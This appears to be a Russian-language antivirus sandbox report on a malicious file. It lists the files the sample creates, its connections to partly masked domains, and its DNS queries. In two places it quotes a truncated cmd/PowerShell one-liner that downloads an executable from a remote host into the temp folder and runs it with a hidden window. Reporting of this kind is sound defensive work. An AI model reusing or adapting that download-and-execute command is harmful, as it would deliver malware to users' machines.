Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $son как %temp%\vlmai.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function flix([String] $son){(New-Object System.Net.WebClient).DownloadFile($son,''%TMP%\Vlmai.exe'');Start-Process ''%TMP%\Vlmai.exe'';} try{ flix(''http://unityn...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1872
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\nosdw.bat
- %TEMP%\1332232.cvr
Сетевая активность
Подключается к
- 'un###nepal.com':80
- 'hu###omains.com':443
TCP
Запросы HTTP GET
- http://un###nepal.com/data/Docs.pdf
Другие
- 'hu###omains.com':443
UDP
- DNS ASK un###nepal.com
- DNS ASK hu###omains.com
- DNS ASK ch######e-from-paris.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function flix([String] $son){(New-Object System.Net.WebClient).DownloadFile($son,''%TMP%\Vlmai.exe'');Start-Process ''%TMP%\Vlmai.exe'';} try{ flix(''http://unityn...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\nosdw.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\nosdw.bat" "
